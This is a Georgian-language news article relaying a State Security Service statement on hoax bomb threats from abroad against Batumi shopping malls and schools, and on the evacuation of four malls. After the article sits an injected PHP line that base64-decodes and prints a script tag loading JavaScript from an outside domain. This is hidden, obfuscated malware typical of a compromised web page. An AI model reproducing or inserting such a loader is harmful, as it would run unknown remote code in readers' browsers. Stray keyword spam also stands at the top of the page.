celsiusi
ავერსი საქკაბელი

 ბათუმში ასაფეთქებელი მოწყობილობების შესახებ შეტყობინებები განხორციელდა ქვეყნის ფარგლებს გარედან, მითითებულ იქნა საქართველოს არასრულწლოვანი მოქალაქის ტელეფონის ნომერი, – ამის შესახებ საქართველოს სახელმწიფო უსაფრთხოების სამსახურის განცხადებაშია ნათქვამი.

„მიმდინარე წლის 21 იანვარს, შემოსულ იქნა შეტყობინებები ქალაქ ბათუმში სხვადასხვა ლოკაციაზე შესაძლო ასაფეთქებელი მოწყობილობების განთავსების შესახებ.

მიღებულ შეტყობინებებთან დაკავშირებით, სპეციალური ღონისძიებები იქნა გატარებული სახელმწიფო უსაფრთხოების სამსახურის კონტრტერორისტული დანაყოფებისა და შინაგან საქმეთა სამინისტროს მიერ ბათუმის სავაჭრო ცენტრებსა და სასწავლო დაწესებულებებში, სადაც ასაფეთქებელი ნივთიერება ან მოწყობილობა აღმოჩენილი არ ყოფილა.

ამ ეტაპზე მოპოვებული ოპერატიული მონაცემების ანალიზით, შეტყობინებები ასაფეთქებელი მოწყობილობების განთავსების შესახებ განხორციელდა ქვეყნის ფარგლებს გარედან, სადაც მიზანმიმართულად მითითებულ იქნა საქართველოს არასრულწლოვანი მოქალაქის სარგებლობაში არსებული მობილური ტელეფონის ნომერი“, – აცხადებენ სუს-ში.

გამოძიება მიმდინარეობს სისხლის სამართლის საქმეზე, ტერორიზმის შესახებ ცრუ შეტყობინების ფაქტზე.

სუს-ის ცნობით, მიმდინარე ოპერატიული და საგამოძიებო ღონისძიებების ფარგლებში, შეტყობინებების ინიციატორის იდენტიფიცირების მიზნით, დახმარებისთვის ეცნობათ პარტნიორი ქვეყნების უწყებებს.

„ამასთან, გვსურს, საზოგადოებას ვაცნობოთ, რომ 2023 წლის 30 დეკემბერს და მიმდინარე წლის 17 იანვარს ცრუ შეტყობინებები „გალერეა თბილისში“ ტერორისტული თავდასხმის შესახებ მიღებულ იქნა საზღვარგარეთიდან და ის უკავშირდება საერთაშორისო ქსელურ თამაშებს, სადაც ჩართული არიან არასრულწლოვანი პირები სხვადასხვა ქვეყნიდან, მათ შორის საქართველოდან.

ასევე, ხსენებული შეტყობინებების ინიციატორებად იდენტიფიცირებულია საზღვარგარეთ მყოფი კონკრეტულ პირთა წრე. ფაქტთან დაკავშირებით გატარებული იქნა შესაბამისი სპეციალური ღონისძიებები.

საქმეზე გამოძიებას აწარმოებს სახელმწიფო უსაფრთხოების სამსახურის კონტრტერორისტული ცენტრი“, – ნათქვამია სუს-ის განცხადებაში.

შეგახსენებთ, რომ გუშინ საღამოს ბათუმის ოთხი დიდი სავაჭრო ცენტრიდან მოქალაქეთა ევაკუაცია განხორციელდა. მიზეზად კი შენობებში ასაფეთქებელი მოწყობილობების არსებობის შესახებ გავრცელებული ინფორმაცია დასახელდა. „მეტრო სითის“, „გრანდ მოლის“, „ბათუმი პლაზასა“ და „ბათუმი მოლის“ ტერიტორია თანამშრომლებს და იქ მყოფ მოქალქეებს 18:00 საათის შემდეგ პოლიციის მითითებით დაატოვებინეს.

166
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");